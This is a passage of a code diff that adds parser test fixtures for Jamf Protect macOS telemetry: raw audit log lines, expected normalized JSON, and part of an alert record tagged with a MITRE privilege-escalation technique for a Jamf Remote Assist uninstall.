(483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841236,\"originalParentPID\":3098,\"processIdentifier\":6654},{\"gid\":20,\"pid\":3098,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"sudo\",\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"sudo\",\"path\":\"/usr/bin/sudo\",\"pgid\":3096,\"ppid\":3096,\"rgid\":20,\"ruid\":501,\"uuid\":\"31060be9-a210-4e18-bec5-2b0b6c482563\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841234,\"originalParentPID\":3096,\"processIdentifier\":6652},{\"gid\":20,\"pid\":3096,\"tty\":\"/dev/ttys016\",\"uid\":501,\"args\":[\"/bin/sh\",\"/Library/Application Support/JAMF/Remote Assist/Uninstall\"],\"name\":\"bash\",\"path\":\"/bin/bash\",\"pgid\":3096,\"ppid\":3063,\"rgid\":20,\"ruid\":501,\"uuid\":\"6600050c-406a-4cd6-8c31-1eefe04fea65\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3063,\"processIdentifier\":6650},{\"gid\":20,\"pid\":3063,\"uid\":501,\"args\":[\"-zsh\"],\"name\":\"zsh\",\"path\":\"/bin/zsh\",\"pgid\":3063,\"ppid\":3062,\"rgid\":20,\"ruid\":501,\"uuid\":\"f596588c-0db5-4fdb-bd64-95584398c596\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3062,\"processIdentifier\":6608},{\"gid\":20,\"pid\":3062,\"uid\":0,\"args\":[\"login\",\"-pf\",\"local-admin\"],\"name\":\"login\",\"path\":\"/usr/bin/login\",\"pgid\":3062,\"ppid\":765,\"rgid\":20,\"ruid\":501,\"uuid\":\"bfd4dcd0-5054-4cab-9b8f-1e650d977771\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":765,\"processIdentifier\":6606},{\"gid\":20,\"pid\":765,\"uid\":501,\"args\":[\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\"],\"name\":\"Terminal\",\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"pgid\":765,\"ppid\":1,\"rgid\":20,\"ruid\":501,\"uuid\":\"7fb1cc18-b1a9-467a-880a-3a6e86960880\",\"flags\":[],\"appPath\":\"/System/Applications/Utilities/Terminal.app\",\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698840671,\"originalParentPID\":1,\"processIdentifier\":1812}]},\"eventType\":\"GPProcessEvent\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/security_authtrampoline", + "/Library/Application Support/JAMF/Remote Assist/Wipe", + "auth 16" + ], + "code_signature": { + "signing_id": "com.apple.security_authtrampoline", + "status": "No error.", + "team_id": "" + }, + "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c", + "executable": "/usr/libexec/security_authtrampoline", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 765, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2023-11-01T12:11:11Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + }, + "name": "security_authtrampoline", + "parent": { + "code_signature": { + "signing_id": "com.jamf.remoteassist.launcher", + "status": "No error.", + "team_id": "483DWKW443" + }, + "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher", + "name": "jamfRemoteAssistLauncher", + "pid": 3099, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:36Z", + "user": { + "id": "0" + } + }, + "pid": 3136, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:38Z", + "tty": "/dev/ttys016", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + ], + "user": [ + "root", + "local-admin", + "" + ] + }, + "tags": [ + "DefenseEvasion", + "T1548.004", + "PrivilegeEscalation", + "MITREattack", + "AbuseElevationControlMechanism" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log new file mode 100644 index 00000000000..5d88378a17a --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log @@ -0,0 +1,7 @@ +{"arguments":{"child_PID":70851},"attributes":{"device":0,"file_access_mode":33261,"file_system_id":16777229,"node_id":632456,"owner_group_id":0,"owner_group_name":"wheel","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"/usr/bin/profiles","2":"status","3":"-type","4":"enrollment"},"args_compiled":"/usr/bin/profiles,status,-type,enrollment"},"exec_chain":{"thread_uuid":"EB3B7725-EB0E-4710-BCA6-F390DD9AE309"},"exec_chain_parent":{"uuid":"87F2E500-EDF1-4F12-A489-C5E05B0F523E"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","PWD":"/"},"env_compiled":"PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":442,"time_seconds_epoch":1707235294,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"a2c787fe5e26ead7c68909e45a75edced4147c68","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"FF48B7F5-C8CD-42E6-8782-5A92D1BD87CE","path":["/usr/bin/profiles","/usr/bin/profiles"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"9cfc802baf45b74693d146686ebe9ec59ac6367f","process_id":70848,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","responsible_process_id":70837,"responsible_process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}} +{"arguments":{"child_PID":70848},"attributes":{"device":0,"file_access_mode":33261,"file_system_id":16777229,"node_id":63665431,"owner_group_id":80,"owner_group_name":"admin","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"EdgeUpdater","2":"--server","3":"--service=update","4":"--enable-logging","5":"--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2","6":"--system"},"args_compiled":"EdgeUpdater,--server,--service=update,--enable-logging,--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2,--system"},"exec_chain":{"thread_uuid":"19B9384C-9C21-4C6C-9954-355AD780910C"},"exec_chain_child":{"parent_path":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","parent_pid":70844,"parent_uuid":"93082F2D-206D-4FA8-925B-6548C6B247C1"},"exec_chain_parent":{"uuid":"EB3B7725-EB0E-4710-BCA6-F390DD9AE309"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","PWD":"/"},"env_compiled":"PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":427,"time_seconds_epoch":1707235294,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"abbed514a26c2f8c80e08a6d81d72ea8029739fe","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"0BE676E2-FFDB-4A75-BBEA-F783E0E573E8","path":["/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"0237c54b185a3b516bb2918132d9d05de10eaa7c","process_id":70847,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","responsible_process_id":70837,"responsible_process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}} +{"arguments":{"child_PID":70843},"attributes":{"device":0,"file_access_mode":35309,"file_system_id":16777229,"node_id":63665429,"owner_group_id":80,"owner_group_name":"admin","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","2":"--internal"},"args_compiled":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher,--internal"},"exec_chain":{"thread_uuid":"3DB0D0B9-31ED-4E4D-9366-C07B622AEBEB"},"exec_chain_parent":{"uuid":"93E2DBD5-9546-430E-ADA0-CA460E0A80C9"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","XPC_FLAGS":"0x0","XPC_SERVICE_NAME":"com.microsoft.EdgeUpdater.wake.system"},"env_compiled":"XPC_SERVICE_NAME=com.microsoft.EdgeUpdater.wake.system,PATH=/usr/bin:/bin:/usr/sbin:/sbin,XPC_FLAGS=0x0"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":316,"time_seconds_epoch":1707235293,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"a2c787fe5e26ead7c68909e45a75edced4147c68","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"18922E6D-7EDA-460B-A5DC-D9B92BA8085E","path":["/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"9cfc802baf45b74693d146686ebe9ec59ac6367f","process_id":70840,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","responsible_process_id":70837,"responsible_process_name":"/usr/libexec/xpcproxy","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}} +{"arguments":{"fd":4},"exec_chain":{"thread_uuid":"2AE4FC6A-7F96-4B7A-B045-D6B3FDED39FE"},"header":{"event_id":32,"event_modifier":0,"event_name":"AUE_CONNECT","time_milliseconds_offset":755,"time_seconds_epoch":1707235837,"version":11},"host_info":{"host_name":"Goomba","host_uuid":"667A9510-585B-526B-9B61-47BD834C8ECE","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WHM0PAQ6NV"},"identity":{"cd_hash":"67ed44d08677ea5d2eb9c7db71be23b127bd3e99","signer_id":"com.apple.nfcd","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"B9C086AE-78C8-4F01-A77D-4AE422F9366D","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":260,"effective_group_name":"_applepay","effective_user_id":260,"effective_user_name":"_applepay","group_id":260,"group_name":"_applepay","process_hash":"137517d0be201cfbf8e9dd97765b3f38f0ae4de5","process_id":1002,"process_name":"/usr/libexec/nfcd","responsible_process_id":1002,"responsible_process_name":"/usr/libexec/nfcd","session_id":100015,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":260,"user_name":"_applepay"}} +{"arguments":{"fd":5},"exec_chain":{"thread_uuid":"39896B66-2B2C-4D33-9A75-58154E8EB508"},"header":{"event_id":32,"event_modifier":0,"event_name":"AUE_CONNECT","time_milliseconds_offset":473,"time_seconds_epoch":1707235836,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"beef65d6aeba15d0dd7ef1a076d4bcbd386c1652","signer_id":"com.apple.mdmclient","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"F3DBBFB9-2FF7-4A14-A57F-A18F9D9E6FD1","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"b71712207edc22d9b5753aac0d927a7d9ded719d","process_id":70971,"process_name":"/usr/libexec/mdmclient","responsible_process_id":70971,"responsible_process_name":"/usr/libexec/mdmclient","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}} +{"exec_chain":{"thread_uuid":"340F694C-4A80-4008-8B99-AEF108250576"},"header":{"event_id":45025,"event_modifier":0,"event_name":"AUE_ssauthorize","time_milliseconds_offset":477,"time_seconds_epoch":1707234868,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"fc3dce73c15ec7a1cba507101fec3a47e268fa27","signer_id":"com.apple.authd","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"DF67FD17-2BE4-4811-933F-78CBA33BAD93","rateLimitingSeconds":1800,"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"b71712207edc22d9b5753aac0d927a7d9ded719d","process_id":69544,"process_name":"/usr/libexec/mdmclient","responsible_process_id":69544,"responsible_process_name":"/usr/libexec/mdmclient","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":959597,"type":4},"user_id":0,"user_name":"root"},"texts":["com.apple.ServiceManagement.daemons.modify","client /usr/libexec/mdmclient","creator /usr/libexec/mdmclient"]} +{"arguments":{"am_failure":0,"am_success":0,"sflags":0},"exec_chain":{"thread_uuid":"8FEACD31-E575-45F4-9A31-F81A6EDF68A8"},"header":{"event_id":44903,"event_modifier":0,"event_name":"AUE_SESSION_END","time_milliseconds_offset":272,"time_seconds_epoch":1707235736,"version":11},"host_info":{"host_name":"Goomba","host_uuid":"667A9510-585B-526B-9B61-47BD834C8ECE","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WHM0PAQ6NV"},"key":"79C80894-E1A4-4BC3-A974-B6EC69CB172D","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"","process_id":0,"process_name":"","responsible_process_id":0,"responsible_process_name":"","session_id":101188,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json new file mode 100644 index 00000000000..2b186323874 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json @@ -0,0 +1,885 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70851 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "/usr/bin/profiles,status,-type,enrollment" + }, + "exec_chain_parent": { + "uuid": "87F2E500-EDF1-4F12-A489-C5E05B0F523E" + }, + "exec_env": { + "env": { + "compiled": "PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin" + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "a2c787fe5e26ead7c68909e45a75edced4147c68", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/usr/bin/profiles", + "/usr/bin/profiles" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "pid": 70848 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:01:34.427Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70848 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "EdgeUpdater,--server,--service=update,--enable-logging,--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2,--system" + }, + "exec_chain_parent": { + "uuid": "EB3B7725-EB0E-4710-BCA6-F390DD9AE309" + }, + "exec_env": { + "env": { + "compiled": "PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin" + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "abbed514a26c2f8c80e08a6d81d72ea8029739fe", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "pid": 70847 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "EdgeUpdater", + "--server", + "--service=update", + "--enable-logging", + "--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2", + "--system" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "0237c54b185a3b516bb2918132d9d05de10eaa7c" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "0237c54b185a3b516bb2918132d9d05de10eaa7c" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:01:33.316Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70843 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher,--internal" + }, + "exec_chain_parent": { + "uuid": "93E2DBD5-9546-430E-ADA0-CA460E0A80C9" + }, + "exec_env": { + "env": { + "compiled": "XPC_SERVICE_NAME=com.microsoft.EdgeUpdater.wake.system,PATH=/usr/bin:/bin:/usr/sbin:/sbin,XPC_FLAGS=0x0", + "xpc": { + "flags": "0x0" + } + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "a2c787fe5e26ead7c68909e45a75edced4147c68", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "pid": 70840 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "--internal" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:10:37.755Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_connect", + "category": [ + "authentication" + ], + "code": "32", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Goomba", + "id": "H2WHM0PAQ6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "fd": "4" + }, + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "667A9510-585B-526B-9B61-47BD834C8ECE" + } + }, + "identity": { + "cd_hash": "67ed44d08677ea5d2eb9c7db71be23b127bd3e99", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "260", + "name": "_applepay" + } + }, + "process": { + "name": "/usr/libexec/nfcd", + "pid": 1002 + }, + "session": { + "id": "100015" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.nfcd" + }, + "exit_code": 0, + "hash": { + "sha1": "137517d0be201cfbf8e9dd97765b3f38f0ae4de5" + }, + "real_group": { + "id": "260", + "name": "_applepay" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "260", + "name": "_applepay" + } + }, + "related": { + "hash": [ + "137517d0be201cfbf8e9dd97765b3f38f0ae4de5" + ], + "hosts": [ + "Goomba" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "_applepay" + ] + }, + "user": { + "id": "260", + "name": [ + "_applepay" + ] + } + }, + { + "@timestamp": "2024-02-06T16:10:36.473Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_connect", + "category": [ + "authentication" + ], + "code": "32", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "fd": "5" + }, + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": 